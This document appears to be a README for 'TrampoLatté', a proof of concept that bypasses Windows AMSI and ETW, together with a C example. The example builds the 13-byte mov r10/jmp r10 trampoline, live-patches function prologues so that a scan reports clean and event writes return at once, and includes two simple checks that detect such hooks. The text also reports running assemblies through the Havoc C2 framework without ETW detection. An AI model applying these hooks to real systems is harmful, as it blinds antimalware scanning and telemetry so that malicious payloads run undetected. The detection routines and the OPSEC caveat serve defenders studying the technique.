TrampoLatté is an AMSI & ETW bypass PoC that uses trampolines to hook specific functions and alter their execution behaviour. Each target's prologue is overwritten with a 13-byte "mov r10, imm64; jmp r10" trampoline: AmsiScanBuffer (amsi.dll) is redirected to a proxy that reports AMSI_RESULT_CLEAN, and EtwpEventWriteFull (ntdll.dll) is redirected to a bare ret stub (C3), so the event is never written.
      AmsiScanBuffer                     EtwpEventWriteFull
            │                                     │
    [13-byte jmp r10]                     [13-byte jmp r10]
            │                                     │
     ┌──────┴──────┐                        ┌─────┴─────┐
     │  ProxyAmsi  │                        │  RetStub  │
     │ (saves ctx) │                        │   (C3)    │
     └──────┬──────┘                        └─────┬─────┘
            ▼                                     ▼
    returns AMSI_RESULT_CLEAN             returns to caller
    to AmsiScanBuffer's caller            (event never written)
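The hook mechanics in the diagram, as an added example that is not TrampoLatté's own code: it encodes the 13-byte trampoline (49 BA imm64 = mov r10, imm64; 41 FF E2 = jmp r10), shows the two checks a scanner would run against a function prologue, and, on x86-64 Linux, applies the hooks to two local stand-ins named scan_buffer and event_write (constructed for this example; they are not amsi.dll or ntdll.dll). The ETW side writes the C3 byte straight into the stand-in's prologue instead of jumping to a separate RetStub, which has the same effect with a 1-byte patch. All function names, the sample buffer and the result values are assumptions, except AMSI_RESULT_CLEAN and AMSI_RESULT_DETECTED, which are the amsi.h constants.

```c
/* Added example, not TrampoLatté's own code: the 13-byte "mov r10, imm64 ; jmp r10"
 * trampoline from the diagram, the integrity checks that spot it, and (x86-64 Linux
 * only) a live hook of two local stand-ins for AmsiScanBuffer and EtwpEventWriteFull. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#if defined(__linux__) && defined(__x86_64__)
#include <sys/mman.h>
#include <unistd.h>
#endif

#define TRAMPOLINE_LEN 13
#define AMSI_RESULT_CLEAN    0      /* values from amsi.h */
#define AMSI_RESULT_DETECTED 32768
#ifdef __GNUC__
#define NOINLINE __attribute__((noinline))
#else
#define NOINLINE
#endif

/* 49 BA <imm64> = mov r10, imm64 (10 bytes), 41 FF E2 = jmp r10 (3 bytes). */
void build_jmp_r10(uint8_t out[TRAMPOLINE_LEN], uint64_t target) {
    out[0] = 0x49; out[1] = 0xBA;
    memcpy(out + 2, &target, sizeof target);            /* imm64, little-endian */
    out[10] = 0x41; out[11] = 0xFF; out[12] = 0xE2;
}

/* Detection: returns 1 and the jump target if a prologue starts with that trampoline. */
int decode_jmp_r10(const uint8_t *code, uint64_t *target) {
    if (code[0] != 0x49 || code[1] != 0xBA) return 0;
    if (code[10] != 0x41 || code[11] != 0xFF || code[12] != 0xE2) return 0;
    memcpy(target, code + 2, sizeof *target);
    return 1;
}

/* Self-check: encode then decode; 1 if the target survives the round trip. */
int trampoline_roundtrip(uint64_t target) {
    uint8_t p[TRAMPOLINE_LEN]; uint64_t back = 0;
    build_jmp_r10(p, target);
    return decode_jmp_r10(p, &back) && back == target;
}

/* Detection: encoding-independent check, in-memory prologue vs. on-disk image bytes.
 * Catches the single-byte C3 stub too, which decode_jmp_r10 would miss. */
int prologue_is_hooked(const uint8_t *in_memory, const uint8_t *on_disk, size_t n) {
    return memcmp(in_memory, on_disk, n) != 0;
}

/* Local stand-ins for the hooked functions (constructed for this example). */
int demo_etw_events = -1;          /* events the hooked "EtwpEventWriteFull" let through */
static int events_written = 0;

static NOINLINE int scan_buffer(const char *buf, size_t len) {   /* ~AmsiScanBuffer */
    for (size_t i = 0; i + 5 <= len; i++)
        if (memcmp(buf + i, "EICAR", 5) == 0) return AMSI_RESULT_DETECTED;
    return AMSI_RESULT_CLEAN;
}
static NOINLINE void event_write(const char *msg) { (void)msg; events_written++; } /* ~EtwpEventWriteFull */
static NOINLINE int proxy_scan(const char *buf, size_t len) {    /* ~ProxyAmsi */
    (void)buf; (void)len;
    return AMSI_RESULT_CLEAN;
}

#if defined(__linux__) && defined(__x86_64__)
/* mprotect the page(s) covering [addr, addr+len). */
static int set_prot(void *addr, size_t len, int prot) {
    uintptr_t page = (uintptr_t)sysconf(_SC_PAGESIZE);
    uintptr_t start = (uintptr_t)addr & ~(page - 1);
    uintptr_t end = ((uintptr_t)addr + len + page - 1) & ~(page - 1);
    return mprotect((void *)start, end - start, prot);
}

/* Hooks both stand-ins, exercises them, unhooks, and returns the scan result
 * (AMSI_RESULT_CLEAN if the redirect worked; -1 if the text pages could not be made writable). */
int live_hook_demo(void) {
    int (*volatile scan)(const char *, size_t) = scan_buffer;  /* volatile: force real indirect calls */
    void (*volatile etw)(const char *) = event_write;
    uint8_t *scan_code = (uint8_t *)(uintptr_t)scan, *etw_code = (uint8_t *)(uintptr_t)etw;
    uint8_t saved_scan[TRAMPOLINE_LEN], saved_etw = etw_code[0], patch[TRAMPOLINE_LEN];
    const char *sample = "MZ..EICAR-STANDARD-ANTIVIRUS-TEST-FILE";   /* constructed input */

    if (set_prot(scan_code, TRAMPOLINE_LEN, PROT_READ | PROT_WRITE | PROT_EXEC) ||
        set_prot(etw_code, 1, PROT_READ | PROT_WRITE | PROT_EXEC)) return -1;
    memcpy(saved_scan, scan_code, TRAMPOLINE_LEN);              /* keep bytes for unhooking */
    build_jmp_r10(patch, (uint64_t)(uintptr_t)proxy_scan);
    memcpy(scan_code, patch, TRAMPOLINE_LEN);                   /* AmsiScanBuffer -> ProxyAmsi */
    etw_code[0] = 0xC3;                                         /* EtwpEventWriteFull -> ret */

    events_written = 0;
    etw("assembly loaded");                                     /* swallowed by the ret stub */
    int result = scan(sample, strlen(sample));                  /* lands in proxy_scan */

    memcpy(scan_code, saved_scan, TRAMPOLINE_LEN);              /* unhook */
    etw_code[0] = saved_etw;
    set_prot(scan_code, TRAMPOLINE_LEN, PROT_READ | PROT_EXEC);
    set_prot(etw_code, 1, PROT_READ | PROT_EXEC);
    demo_etw_events = events_written;
    return result;
}
#else
int live_hook_demo(void) { return -1; }   /* live part needs x86-64 Linux */
#endif

int main(void) {
    printf("trampoline round trip ok: %d\n", trampoline_roundtrip(0x7ff8a1b2c3d4ULL));
    int r = live_hook_demo();
    printf("hooked scan returned %d (0 = AMSI_RESULT_CLEAN), ETW events written: %d\n", r, demo_etw_events);
    return 0;
}
```

Build with a GCC or Clang toolchain (the NOINLINE attribute and the volatile function pointers keep the compiler from inlining the stand-ins, which would bypass the patched prologue). The sequence is the one the PoC has to perform against real DLLs as well: read and keep the original bytes, make the text page writable, write the patch, and restore afterwards. That write-to-text transition and the altered prologue are precisely what prologue_is_hooked and a memory-integrity scan key on.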
- Started a custom ETW consumer (right terminal) that monitors the .NET runtime provider
- Executing assemblies through Havoc does not trigger any ETW-based detection: with the hook in place, no .NET runtime events reach the consumer
This is just a PoC and is not OPSEC safe: the hooks are plain inline patches of the first bytes of exported functions in amsi.dll and ntdll.dll, so any scanner that compares the loaded text sections with the on-disk images, or simply checks the AmsiScanBuffer prologue for a jmp, will spot them.